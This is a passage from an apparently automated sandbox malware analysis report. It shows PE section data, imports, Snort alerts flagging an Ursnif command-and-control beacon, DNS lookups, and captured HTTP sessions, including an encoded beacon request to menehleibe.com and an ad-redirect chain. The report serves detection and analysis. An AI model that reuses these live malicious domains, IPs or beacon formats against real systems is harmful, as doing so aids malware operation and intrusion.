NcZcjaDP  0x330000         0x8baf        0x8c00    False     0.358286830357   data          4.53824163163
mIUEylgT  0x339000         0x2abec       0x2ac00   False     0.225660179094   data          3.89084100028
lluFjCpP  0x364000         0x1242        0x1400    False     0.3734375        data          4.01527750922
BHqNuAAF  0x366000         0x2fe5        0x3000    False     0.404296875      data          5.07399713959
dWFkhiaJ  0x369000         0xe12b        0xe200    False     0.451552129425   data          5.04492106469
NeKPPFmp  0x378000         0x10dc        0x1200    False     0.41015625       data          4.74787400821
mRaJxCpw  0x37a000         0x2d55        0x2e00    False     0.40090013587    data          5.08071078207
sjZRApAc  0x37d000         0x51e6        0x5200    False     0.340224847561   data          4.57864669136
mJuapRBt  0x383000         0x2896        0x2a00    False     0.399181547619   data          5.11002345911
AUQwTDRB  0x386000         0x6513        0x6600    False     0.320465686275   data          4.31847897425
Mzpcxreq  0x38d000         0x82bc        0x8400    False     0.261156486742   data          3.767572246
DQLewjlc  0x396000         0x22a9        0x2400    False     0.397135416667   data          5.07745042262
yQzDovRx  0x399000         0x187         0x200     False     0.44140625       data          2.58744007464
KsasGyWE  0x39a000         0x341c        0x3600    False     0.452618634259   data          4.59764407477
qALhWEsZ  0x39e000         0x978         0xa00     False     0.408984375      data          4.298132059
EhLKChYp  0x39f000         0xc9c7        0xca00    False     0.356725711634   data          4.56772549135
juiuAwmE  0x3ac000         0x805         0xa00     False     0.3203125        data          3.84392745238
FPCcnPuO  0x3ad000         0x30066       0x30200   False     0.185328733766   data          5.48813033427
DQPOFovS  0x3de000         0x2e49        0x3000    False     0.396647135417   data          5.03014687317
eeLebknr  0x3e1000         0x165f        0x1800    False     0.357421875      data          3.82572779856

                                                                                                                                                                      Resources

Name         RVA      Size   Type                    Language  Country
RT_MANIFEST  0x3e060  0x17d  XML 1.0 document text   English   United States

                                                                                                                                                                      Imports

DLL           Import
KERNEL32.dll  ExitProcess, GetModuleHandleW, WideCharToMultiByte, LoadLibraryW, Sleep, GetModuleFileNameW, GetTempPathW, VirtualProtect, GetCurrentProcessId, EncodePointer, DecodePointer, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, GetLastError, GetModuleHandleExW, GetProcAddress, MultiByteToWideChar, HeapSize, HeapFree, HeapAlloc, SetLastError, GetCurrentThreadId, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EnterCriticalSection, LeaveCriticalSection, LoadLibraryExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, LCMapStringW, OutputDebugStringW, GetStringTypeW, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetStdHandle, SetFilePointerEx, WriteConsoleW, CloseHandle, CreateFileW

                                                                                                                                                                      Possible Origin

Language of compilation system  Country where language is spoken  Map
English                         United States

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                                    Source Port  Dest Port  Source IP    Dest IP
09/14/21-16:03:19.921633  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49737        80         192.168.2.6  173.239.8.164
09/14/21-16:03:19.921633  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49737        80         192.168.2.6  173.239.8.164
09/14/21-16:03:20.611062  TCP       2030821  ET MALWARE Win32/Zonebac Traffic Redirect                  49737        80         192.168.2.6  173.239.8.164

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets


                                                                                                                                                                      UDP Packets

                                                                                                                                                                      Sep 14, 2021 16:03:32.774014950 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:32.802583933 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:33.456876040 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:33.512201071 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:33.832693100 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:33.869004011 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:34.882792950 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:34.911484003 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:35.330614090 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:35.361411095 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:35.818566084 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:35.845401049 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:37.120443106 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:37.147418022 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:39.126331091 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:39.167191029 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:40.212603092 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:40.239373922 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:47.589806080 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:47.659252882 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:48.264544010 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:48.296758890 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:48.322751045 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:48.324810028 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:48.591943979 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:48.631686926 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:49.635165930 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:49.663881063 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:50.938179016 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:50.980142117 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:51.681217909 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:51.719065905 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:55.699737072 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:55.729726076 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:04:09.371015072 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:04:09.435826063 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:04:28.190947056 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:04:28.229515076 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:04:30.006293058 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:04:30.052378893 CEST53621168.8.8.8192.168.2.6

                                                                                                                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 14, 2021 16:03:19.723831892 CEST | 192.168.2.6 | 8.8.8.8 | 0x9451 | Standard query (0) | menehleibe.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:21.819623947 CEST | 192.168.2.6 | 8.8.8.8 | 0x1065 | Standard query (0) | mybetterdl.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:22.631850958 CEST | 192.168.2.6 | 8.8.8.8 | 0x9179 | Standard query (0) | p226681.mybetterdl.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:23.476247072 CEST | 192.168.2.6 | 8.8.8.8 | 0xd2e1 | Standard query (0) | gertrk.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.063437939 CEST | 192.168.2.6 | 8.8.8.8 | 0xb4d3 | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.214965105 CEST | 192.168.2.6 | 8.8.8.8 | 0x6538 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)

                                                                                                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 14, 2021 16:03:19.756581068 CEST | 8.8.8.8 | 192.168.2.6 | 0x9451 | No error (0) | menehleibe.com |  | 173.239.8.164 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:19.756581068 CEST | 8.8.8.8 | 192.168.2.6 | 0x9451 | No error (0) | menehleibe.com |  | 74.206.228.78 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:19.756581068 CEST | 8.8.8.8 | 192.168.2.6 | 0x9451 | No error (0) | menehleibe.com |  | 173.239.5.6 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:21.848687887 CEST | 8.8.8.8 | 192.168.2.6 | 0x1065 | No error (0) | mybetterdl.com |  | 173.192.101.24 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:22.679900885 CEST | 8.8.8.8 | 192.168.2.6 | 0x9179 | No error (0) | p226681.mybetterdl.com |  | 173.192.101.24 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:23.514079094 CEST | 8.8.8.8 | 192.168.2.6 | 0xd2e1 | No error (0) | gertrk.com |  | 168.119.139.96 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.098937035 CEST | 8.8.8.8 | 192.168.2.6 | 0xb4d3 | No error (0) | google.com |  | 142.250.203.110 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com |  | 142.250.102.106 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com |  | 142.250.102.105 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com |  | 142.250.102.99 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com |  | 142.250.102.147 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com |  | 142.250.102.104 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com |  | 142.250.102.103 | A (IP address) | IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • menehleibe.com
                                                                                                                                                                        • mybetterdl.com
                                                                                                                                                                        • p226681.mybetterdl.com
                                                                                                                                                                        • gertrk.com
                                                                                                                                                                      • www.google.com
                                                                                                                                                                      • https:
                                                                                                                                                                      • google.com

                                                                                                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49739 | 173.192.101.24 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49741 | 173.192.101.24 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49748 | 142.250.203.110 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Sep 14, 2021 16:03:24.150072098 CEST | 1064 | OUT | GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: google.com
Connection: Keep-Alive
Sep 14, 2021 16:03:24.203008890 CEST | 1071 | IN | HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Content-Type: text/html; charset=UTF-8
Date: Tue, 14 Sep 2021 14:03:24 GMT
Expires: Thu, 14 Oct 2021 14:03:24 GMT
Cache-Control: public, max-age=2592000
Server: gws
Content-Length: 219
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.6 | 49749 | 142.250.102.106 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Sep 14, 2021 16:03:24.290153980 CEST | 1071 | OUT | GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.google.com
Sep 14, 2021 16:03:24.355325937 CEST | 1072 | IN | HTTP/1.1 302 Found
Location: https://www.google.com/?gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 14 Sep 2021 14:03:24 GMT
Server: gws
Content-Length: 231
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/?gws_rd=ssl">here</A>.</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49743 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49744 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49746 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49751 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.6 | 49752 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.6 | 49755 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.6 | 49757 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.6 | 49737 | 173.239.8.164 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Sep 14, 2021 16:03:19.921633005 CEST | 1024 | OUT | GET /images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Connection: Keep-Alive
Sep 14, 2021 16:03:20.024328947 CEST | 1024 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:19 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 145
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Location: http://menehleibe.com/
                                                                                                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Sep 14, 2021 16:03:20.027059078 CEST | 1024 | OUT | GET / HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Connection: Keep-Alive
Sep 14, 2021 16:03:20.137682915 CEST | 1025 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:20 GMT
                                                                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Content-Encoding: gzip
Sep 14, 2021 16:03:20.611062050 CEST | 1025 | OUT | POST / HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Content-Length: 12
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Data Raw: 69 63 3d 30 26 66 62 3d 74 72 75 65
                                                                                                                                                                      Data Ascii: ic=0&fb=true
Sep 14, 2021 16:03:21.647305965 CEST | 1027 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:21 GMT
                                                                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Set-Cookie: ipc=eyJ2ZXJzaW9uIjoxLCJzdWJJZCI6MywiZm9sZGVySWQiOjEsImZlZWRJZCI6MjEsInRzIjoxNjMxNjI4MjAxLCJoYXNoIjoiN2E3ZmJiNTgifQ==;Expires=Tue, 14-Sep-2021 15:03:21 GMT;Max-Age=3600
                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                      Content-Encoding: gzip


                                                                                                                                                                      HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49739 | 173.192.101.24 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                      2021-09-14 14:03:22 UTC0OUTGET /aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrmTazGZKmMBhE5rzai4ARXglTM7lPAlIssdjgnlOgBObVnL6dMrNPV4wycVX3s5OxtJMXedCWE2r5biNOcX3y5Pmw-0BUdBZv7MvlSTP2Fk9AaabOem2Q73GpjsG_dwXVnUc2FH6zZuqWu2Dli66C-XucADfX2tBPlR3prQOfp40mttv00_iCR6q6fLI9QZgGY11WgfO3qdEgV2xwoj0eGTIxBicwTEMicE9X3AYQsCpAEn3pdnGSoQpHTA7Kz9fo94mKnTULy2teQgTesP9hhxLreOeHrbCzwHSSbH-FJZx15JZAYCxI8gV6bvS4IWlDg_vysGgTqrjiFCjhA5kocz54NYxtQVvyXSZspRWMKjI1QYN8ennj2JVFvWfYyzeLbGr1ovqBCtNBvJi2ztcTgBlsW0SM8XIsRgd4QMcWZcycyUPzb9Wd1bDxFTAWmSXH43ynD5UObBi5FyNDw8qKKmoCnfedHiztWYQxKotKUGaKd1m_k2iMIc5SBU1Vi7-MGW4_Mi4WYIzJL61eBLaioPhng2BQ6PDt8aAWdDMho29RkRFHVPIQb3W3nWMGo8srLOHYnfrFRuEDgcm6cqkr2IQD0T7sB-GexA77NdWEi2cdlkkLEB146pQ HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: mybetterdl.com
                                                                                                                                                                      Connection: Keep-Alive
2021-09-14 14:03:22 UTC | 1 | IN | HTTP/1.1 302
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:22 GMT
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: rhid=79630578833; Max-Age=15552000; Expires=Sun, 13-Mar-2022 14:03:22 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Location: https://p226681.mybetterdl.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49741 | 173.192.101.24 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                      2021-09-14 14:03:23 UTC2OUTGET /adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0 HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Host: p226681.mybetterdl.com
                                                                                                                                                                      Cookie: rhid=79630578833
2021-09-14 14:03:23 UTC | 3 | IN | HTTP/1.1 302
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:23 GMT
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: rhid=79630578833; Max-Age=15552000; Expires=Sun, 13-Mar-2022 14:03:23 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Set-Cookie: loi=ad_1007735_off_459698_aff_88561_cid_226681-MENEHLEIBE.COM_ts_1631628203; Max-Age=3600; Expires=Tue, 14-Sep-2021 15:03:23 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Location: https://gertrk.com/click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49743 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:23 UTC | 4 | OUT | GET /click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://menehleibe.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: gertrk.com
2021-09-14 14:03:23 UTC | 4 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Tue, 14 Sep 2021 14:03:23 GMT
